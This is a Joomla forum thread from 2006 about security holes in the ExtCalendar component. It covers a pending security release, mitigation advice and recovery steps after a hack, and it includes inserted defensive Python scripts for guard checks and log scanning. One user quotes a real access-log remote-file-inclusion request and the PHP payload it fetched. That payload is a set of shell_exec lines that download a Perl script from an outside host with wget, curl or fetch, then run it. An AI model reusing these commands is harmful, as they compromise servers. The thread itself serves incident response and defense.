[UPGRADE AVAIL.] ExtCalendar Vulnerability
- RobinH
- Joomla! Enthusiast
- Posts: 177
- Joined: Mon Sep 19, 2005 6:29 pm
- Location: Lake Norman, North Carolina, USA
Re: ExtCalendar
Buster wrote: That's strange, the last e-mail I got from the developer it was a HE not SHE and his name is David. Has he had surgery?
Okay....mmmm... Elpie is the name, and the avatar is very feminine but definitely not a David...
Last edited by RobinH on Fri Jul 14, 2006 4:40 pm, edited 1 time in total.
- leolam
- Joomla! Master
- Posts: 20651
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: ExtCalendar
Buster wrote: That's strange, the last e-mail I got from the developer it was a HE not SHE and his name is David. Has he had surgery?
Buster,
your post is almost at the bottom of page no. 3...guess what has been written before?
what happened to that avatar of yours anyhow?
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
- leolam
- Joomla! Master
- Posts: 20651
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: ExtCalendar
RobinH wrote: Buster wrote: That's strange, the last e-mail I got from the developer it was a HE not SHE and his name is David. Has he had surgery?
if you tell Lynne that she has had surgery....beware!
cheers
Leo
Last edited by leolam on Fri Jul 14, 2006 4:52 pm, edited 1 time in total.
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
- RobinH
- Joomla! Enthusiast
- Posts: 177
- Joined: Mon Sep 19, 2005 6:29 pm
- Location: Lake Norman, North Carolina, USA
Re: ExtCalendar
By the way Buster, the readme file is from a David, so it appears to be a team effort!
Last edited by RobinH on Fri Jul 14, 2006 4:41 pm, edited 1 time in total.
- leolam
- Joomla! Master
- Posts: 20651
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: ExtCalendar
Elpie,
the read-me file has some issues..i have send them to you...your pm is almost full..cheers
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
- infograf768
- Joomla! Master
- Posts: 19133
- Joined: Fri Aug 12, 2005 3:47 pm
- Location: **Translation Matters**
Re: ExtCalendar
May I insist, as this thread is getting quite complex, for all to keep OT?
No flame, no surgery please.
Keep the flame personal and the surgery to the humour zone.
Any further OT will be edited/deleted.
Jean-Marie Simonet / infograf
---------------------------------
ex-Joomla Translation Coordination Team • ex-Joomla! Production Working Group
- Buster
- Joomla! Guru
- Posts: 619
- Joined: Mon Nov 28, 2005 10:29 am
- Location: England
Re: ExtCalendar
Hi Robin
thanks for letting me know. I spoke to David in April and he said he was looking for help or to hand the project off to someone to develop ExtCalendar and if Elpie is working on it then it should be very good - any chance of a copy of the RC1 anywhere?
Buster
PS. Infograf, no worries Leolam loves me really it's a football thing!
A true Panspermian........aren't we all?
- RobinH
- Joomla! Enthusiast
- Posts: 177
- Joined: Mon Sep 19, 2005 6:29 pm
- Location: Lake Norman, North Carolina, USA
Re: ExtCalendar
Buster wrote: Hi Robin
You'd have to contact Elpie... I boo boo'd...
thanks for letting me know. I spoke to David in April and he said he was looking for help or to hand the project off to someone to develop ExtCalendar and if Elpie is working on it then it should be very good - any chance of a copy of the RC1 anywhere?
Buster
PS. Infograf, no worries Leolam loves me really it's a football thing!
-
- Joomla! Explorer
- Posts: 251
- Joined: Mon Sep 05, 2005 3:50 pm
Re: ExtCalendar
To clear up any confusion, I'm the David working on the security release of ExtCalendar and I'm not David Raison. I just stepped up to the plate to help out with a security release of ExtCalendar. This is going to be a security only update.
A few more issues to resolve and we should be good to go.
david
- RobinH
- Joomla! Enthusiast
- Posts: 177
- Joined: Mon Sep 19, 2005 6:29 pm
- Location: Lake Norman, North Carolina, USA
Re: ExtCalendar
davidrrm wrote: To clear up any confusion, I'm the David working on the security release of ExtCalendar and I'm not David Raison. I just stepped up to the plate to help out with a security release of ExtCalendar. This is going to be a security only update.
Hey David, I posted my testing results over on Mambo Guru Forums. Didn't know who to send them to and had to go catch some z's. PM'd Elpie but she was offline and I had to go and didn't want anyone to miss the results. She PM'd me earlier about the testing. I'll pop off one to you too. Thanks for inviting me to help with the testing!
A few more issues to resolve and we should be good to go.
david
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: ExtCalendar
Ok, I guess there is enough confusion out there that perhaps some clarity should be given.
The original developer of ExtCalendar, David Raison, stopped working on it some time ago. When the security issues came up, I tried to contact him with no success, as did members of the Joomla team. There are too many people using ExtCalendar for it to just be left as abandonware, so when davidrrm offered his help with it on this forum and nobody took him up on the offer, I contacted him and also asked Martin Brampton (counterpoint) if they were prepared to work together to bring us a security update. David is a hugely talented and experienced coder, as is Martin, and I am not working on this code at all. My contribution is simply in bringing the people together, helping the guys where I can, and taking care of the information and people side of things.
As Phil said, we found there was a lot more work involved than originally anticipated and discovered a number of potential vulnerabilities (that have not, as yet, become exploits). We have RC2 out for testing and are trying to get this out to you as soon as possible.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
-
- Joomla! Apprentice
- Posts: 8
- Joined: Thu Jul 13, 2006 12:51 pm
Re: ExtCalendar
Any news? I'm being patient, but I swear I check this thread at least two times every hour, hoping that the email notification didn't work and there's a new reply with news of the security fix waiting for me. I'm eagerly anticipating it! Thanks again to those of you working on this project. I appreciate your efforts!!
- leolam
- Joomla! Master
- Posts: 20651
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: ExtCalendar
boardmoose wrote: Any news? I'm being patient, but I swear I check this thread at least two times every hour, hoping that the email notification didn't work and there's a new reply with news of the security fix waiting for me. I'm eagerly anticipating it! Thanks again to those of you working on this project. I appreciate your efforts!!
This is a little bit much more than a security fix......many people around the globe are now testing version RC2 and believe me it looks very promising and I expect that the developers can release very quickly now...It will take another day or so depending on what "elpie" we find but they (Martin, David and Elpie and many more now involved) are amazingly talented people bringing the goods to us in this community. Be patient and your rewards will be endless...these people do not provide quick fixes. They provide structural solutions.....and again from our testing as well the solution looks quite good! soon my friend....soon....
cheers
Leo
edited: because amazing interference
Last edited by leolam on Tue Jul 18, 2006 9:39 am, edited 1 time in total.
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
- RobinH
- Joomla! Enthusiast
- Posts: 177
- Joined: Mon Sep 19, 2005 6:29 pm
- Location: Lake Norman, North Carolina, USA
Re: ExtCalendar
Initial results look VERY promising!
-
- Joomla! Apprentice
- Posts: 6
- Joined: Mon Jul 17, 2006 11:30 am
Re: ExtCalendar
Hi Robin,
Do you have any news? I'm worried about my site and would like to know what to do asap.
Thank you, Kindest Regards, Emma
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: ExtCalendar
Emma, please disable your ExtCalendar by changing file permissions to 000. We are in the final phases of testing but as this is a full upgrade that fixes a lot of security issues it has been a lot more work than just a simple patch. I can't give a time for its release but we are trying to get a stable, fully-tested upgrade out as soon as possible.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
- RobinH
- Joomla! Enthusiast
- Posts: 177
- Joined: Mon Sep 19, 2005 6:29 pm
- Location: Lake Norman, North Carolina, USA
Re: ExtCalendar
I'm not responsible for the release, just helping with testing, so not sure when it's coming out but again - feel it'll be very soon.
-
- Joomla! Apprentice
- Posts: 6
- Joined: Mon Jul 17, 2006 11:30 am
Re: ExtCalendar
Thanks for the info...I don't really want to have to do that though as it is a main source of info on the site. Is there any other temporary solution for now you can think of?
Kindest Regards, Emma
- nathandiehl
- Joomla! Champion
- Posts: 6044
- Joined: Fri Aug 19, 2005 3:03 pm
- Location: Indiana, USA
- Contact:
Re: ExtCalendar
Emma,
a temporary solution could be to run RC2 on your live site, but this is certainly not stable, and they don't know if it's secure or not.
the ONLY sure thing is to disable extCal.
If you're new to Joomla, Please read Anna's Joomla! Tips: http://forum.joomla.org/viewtopic.php?t=5503
http://nathandiehl.com | Find out what makes me tick
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: ExtCalendar
You could go through every single file and add this to the top (just below the <?php starting code):

Code:
```php
// Don't allow direct linking
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
```

This will help defend against the most common attack we are seeing against ExtCalendar BUT it will still not be secure. If you can, also set register_globals OFF (your host may be willing to do this so globals are off server-wide, which they should be for security) - there is more information about register_globals in this forum. That will also help protect your site, but not completely secure ExtCalendar.
Most importantly, BACKUP, BACKUP, BACKUP. There is a risk your site may be found by hackers, but you are the only one to decide what level of risk you are prepared to take. With daily backups of your database (and files if restoring them from scratch would be a hassle) you can at least come back fairly quickly if your site is exploited. Up to you to decide.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
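Elpie's advice above means checking every PHP file in the component by hand. The script below is an added example (not code from this thread, from ExtCalendar or from Joomla) that does that check automatically: it walks a component directory and lists every `.php` file that does not contain the `defined( '_VALID_MOS' ) or die( ... )` line. Any file it lists can be requested directly by URL without going through `index.php`, which is the access path the guard closes. The sample component tree and file contents in `demo()` are constructed for the demonstration; point `find_unguarded()` at a real `com_extcalendar` directory to audit it.

```python
"""List PHP files in a component that lack the _VALID_MOS direct-access guard.

Added example, not part of the thread or of ExtCalendar. The files written by
demo() are constructed sample data.
"""
import os
import re
import tempfile

# Matches the guard with either quoting style and any spacing, e.g.
#   defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
#   defined("_VALID_MOS") or die("no direct access");
GUARD_RE = re.compile(
    r"""defined\s*\(\s*['"]_VALID_MOS['"]\s*\)\s*or\s*die\s*\(""",
    re.IGNORECASE,
)


def has_direct_access_guard(source: str) -> bool:
    """Return True if the PHP source text contains the _VALID_MOS guard."""
    return GUARD_RE.search(source) is not None


def find_unguarded(root: str):
    """Return the sorted relative paths of .php files under root without the guard."""
    missing = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue  # readme, language and image files are not reachable as code
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                if not has_direct_access_guard(fh.read()):
                    missing.append(os.path.relpath(path, root))
    return sorted(missing)


def demo():
    """Build a constructed com_extcalendar tree and return its unguarded files."""
    with tempfile.TemporaryDirectory() as root:
        comp = os.path.join(root, "com_extcalendar")
        os.makedirs(os.path.join(comp, "admin"))
        samples = {
            # guarded, exactly as Elpie recommends
            "extcalendar.php": (
                "<?php\n// Don't allow direct linking\n"
                "defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );\n"
                "echo 'calendar';\n"
            ),
            # unguarded: reachable directly by URL
            "config.inc.php": "<?php\n$cfg = array();\n",
            # guarded with double quotes and no padding spaces
            "admin/admin.extcalendar.php": '<?php\ndefined("_VALID_MOS") or die("no direct access");\n',
            # not PHP, ignored
            "readme.txt": "constructed readme\n",
        }
        for rel, body in samples.items():
            with open(os.path.join(comp, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return find_unguarded(comp)


if __name__ == "__main__":
    for rel in demo():
        print("missing guard:", rel)
```

The regex is deliberately loose about whitespace and quoting because hand-edited files rarely match one exact string; it only answers "is the guard present anywhere", so a file that includes it after code has already run would still pass and still needs a manual look.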
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: ExtCalendar
nathandiehl wrote: a temporary solution could be to run RC2 on your live site, but this is certainly not stable, and they don't know if it's secure or not.
RC2 is not available to anyone except our testers at the moment nathan. Because we are doing extensive testing on it we are also uncovering a few bugs that must have been bothering people for some time. We did not intend to do more than a security release, but we have ended up fixing a few things as well. An RC3 will be out today and hopefully this will pass our rigorous testing and we will be good to go.
The upgrade is being designed to work with both Joomla and Mambo, is being tested across versions and on both Linux and IIS. We felt ExtCalendar is too important to too many people for the release to be rushed and we want to be as sure as possible that it's a solid upgrade.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
- sc00zy
- Joomla! Exemplar
- Posts: 9532
- Joined: Thu Aug 18, 2005 9:07 am
- Location: Assen, Netherlands
- Contact:
Re: ExtCalendar
Elpie wrote: Emma, please disable your ExtCalendar by changing file permissions to 000. We are in the final phases of testing but as this is a full upgrade that fixes a lot of security issues it has been a lot more work than just a simple patch. I can't give a time for its release but we are trying to get a stable, fully-tested upgrade out as soon as possible.
Simply set all permissions on files and folders within com_extcalendar would be fine?
Arjan Menger
https://welldotcom.nl - Puntgaaf Internetbureau
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: ExtCalendar
sc00zy wrote: Simply set all permissions on files and folders within com_extcalendar would be fine?
If you set them to 000, so nobody and no user and no group has access, you will completely disable ExtCalendar but it should then be safe until we can release the update. Removing all ExtCalendar files through FTP will have the same effect - DON'T remove through Joomla or you will lose all your ExtCalendar data tables and lose all information. If you want to keep it running on your site though you will need to follow the advice I gave Emma and weigh up the risks of it possibly being exploited.
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
- sc00zy
- Joomla! Exemplar
- Posts: 9532
- Joined: Thu Aug 18, 2005 9:07 am
- Location: Assen, Netherlands
- Contact:
Re: ExtCalendar
Thanks. I will temporarily delete the files.
Arjan Menger
https://welldotcom.nl - Puntgaaf Internetbureau
-
- Joomla! Ace
- Posts: 1942
- Joined: Thu Aug 18, 2005 5:53 pm
- Location: Washington D.C. & Baltimore, MD Metro
- Contact:
Re: ExtCalendar
Hi all,
After scanning through the pages of this thread I didn't see any mention of extcal being used for SPAM purposes.
My personal site was hacked via extcal and used to send out SPAM. The SPAM was sent out using the backend extcal admin configuration where you can configure the "admin" to be notified of new front-end submissions.
The funny thing is that I had previously removed any mention of extcal in my menus and had already removed the publicly viewable extcal copyright notices, as well as unpublished any and all references to extcal (since I was no longer using it on my site). I had just never uninstalled it.
Yet it still got hacked. I also find it interesting that my personal site has never been submitted to ANY search engines, yet somehow it was found and used.
Just my 2-cents and thought I'd report on the SPAM aspect since I didn't see it mentioned anywhere.
--Roger
Thanks,
Roger Raymond
Techno Puzzle
-
- Joomla! Fledgling
- Posts: 3
- Joined: Tue Jul 18, 2006 12:19 am
Re: ExtCalendar -- here is the script used to break in
Hello Everyone,
My calendar was hacked as well so I've disabled it. They came back today and I found some interesting breadcrumbs in the access_log.
Perhaps this will help devise a defense.

Code:
```text
9600: 65.75.190.45 - - [17/Jul/2006:20:09:10 -0400] "GET /web/component/option,com_extcalendar/Itemid,/extmode,view/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.aol.eu.com/cc2.php??
```

Which grabs these interesting scripts:

Code:
```php
<?
shell_exec('cd /tmp;wget http://www.aol.eu.com/nowka.txt;perl nowka.txt;touch .paka;rm nowka.txt.*');
shell_exec('cd /tmp;curl -O http://www.aol.eu.com/nowka.txt;perl nowka.txt;touch .paka;rm nowka.txt.*');
shell_exec('cd /tmp;lwp-download http://www.aol.eu.com/nowka.txt;perl nowka.txt;touch .paka;rm nowka.txt.*');
shell_exec('cd /tmp;lynx -source http://www.aol.eu.com/nowka.txt >batek.txt;perl batek.txt;touch .paka;rm batek.txt.*');
shell_exec('cd /tmp;fetch http://www.aol.eu.com/nowka.txt >batek.txt;perl batek.txt;touch .paka;rm batek.txt.*');
shell_exec('cd /tmp;GET http://www.aol.eu.com/nowka.txt >batek.txt;perl batek.txt;touch .paka;rm batek.txt.*');
?>
```

http://www.aol.eu.com/nowka.txt for example is a spreader/portscanner/udpflooder
So now what should we do if our systems are compromised (change passwords, permissions)?
Suggestions?
Thanks
Tony
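The log line Tony posted has a recognisable shape: a request to a component file whose query string assigns a remote URL to `mosConfig_absolute_path`, the setting the script then includes. The following is an added example (not Tony's code and not from ExtCalendar or Joomla) of a small access-log scanner that looks for that shape. It generalises a step beyond the posted line: it flags any query parameter whose value is a URL, not only `mosConfig_absolute_path`, because other configuration variables are injected the same way when register_globals is On. The log lines in `SAMPLE_LOG` are constructed; the IP addresses and host names in them are placeholders, not values from the thread.

```python
"""Flag access-log requests that pass a remote URL as a query parameter.

Added example, not part of the thread. SAMPLE_LOG is constructed data with
placeholder addresses and hosts.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Combined-log prefix up to the request target. Nothing after the target is
# required, so a line cut off after the query (as in the posted log) still parses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)'
)
# A parameter value that names a remote resource.
URL_VALUE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def rfi_params(target: str):
    """Return (name, value) pairs in the request target whose value is a remote URL."""
    query = urlsplit(target).query
    return [
        (name, value)
        for name, value in parse_qsl(query, keep_blank_values=True)
        if URL_VALUE_RE.match(value)
    ]


def scan_log(lines):
    """Return one finding per log line that carries a URL-valued parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        hits = rfi_params(m.group("target"))
        if hits:
            findings.append(
                {
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "path": urlsplit(m.group("target")).path,
                    "params": hits,
                }
            )
    return findings


# Constructed sample: one injection attempt shaped like the posted line, two
# ordinary component requests, and one line that is not a request at all.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jul/2006:20:09:10 -0400] "GET /components/com_extcalendar/'
    'extcalendar.php?mosConfig_absolute_path=http://attacker.example.net/cc2.php?? HTTP/1.1" 200 512',
    '198.51.100.7 - - [17/Jul/2006:20:10:02 -0400] "GET /index.php?option=com_extcalendar&Itemid=12 HTTP/1.1" 200 8231',
    '198.51.100.7 - - [17/Jul/2006:20:10:05 -0400] "GET /components/com_extcalendar/images/cal.gif HTTP/1.1" 200 1180',
    "[notice] constructed non-request line",
]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        names = ", ".join(name for name, _ in f["params"])
        print(f'{f["time"]} {f["ip"]} {f["path"]} <- URL in: {names}')
```

A hit on a parameter such as `mosConfig_absolute_path` is the strongest signal, since that is a configuration variable no legitimate request sets; a URL in a parameter like `return` may be ordinary application behaviour, so treat the general match as a lead to check rather than a verdict.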
- Elpie
- Joomla! Guru
- Posts: 903
- Joined: Wed Aug 17, 2005 11:26 pm
- Contact:
Re: ExtCalendar
Tony, please read the threads here about what to do if you have been hacked.
This exploit needed only one thing on your site for it to be run - register_globals On. There is information here about how to turn register_globals Off if your host won't do that for you.
What you need to do now is this:
1. Contact your host and inform them that your site has been hacked (and give them the log information you posted here).
Ask your host to change register_globals to Off.
2. If your host has a full backup, you should clean out the injected files then restore your site from backup. It is extremely important that you don't miss any hacker files.
3. Read the posts here about securing your site.
4. Trace the owner of the IP that was used and report the abuse.
5. Contact aol.eu.com and report the abuse.
Good luck!
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
-
- Joomla! Apprentice
- Posts: 9
- Joined: Thu Aug 18, 2005 12:30 pm
Re: ExtCalendar
Hi All,
I was also hacked and I changed the globals.php file as mentioned somewhere else on this site by RobS. (Changed the rg_emulation to 0). Everything seemed to work just fine except the Joomlaboard and pmsII. I had to change it back unfortunately.
Just in case someone else wants to do this for security.
-
- Joomla! Apprentice
- Posts: 6
- Joined: Mon Jul 17, 2006 11:30 am
Re: ExtCalendar
just changed file permissions to 000 and it has taken down the whole site...please help me asap.
-
- Joomla! Champion
- Posts: 5883
- Joined: Tue Aug 23, 2005 1:56 pm
- Location: South coast, UK
- Contact:
Re: ExtCalendar
Change them back and then change each one, one at a time, and check your site. I suspect that you have changed other files than extcalendar.
https://gadsolutions.biz Electrical services
https://electrical-testing-safety.co.uk Testing services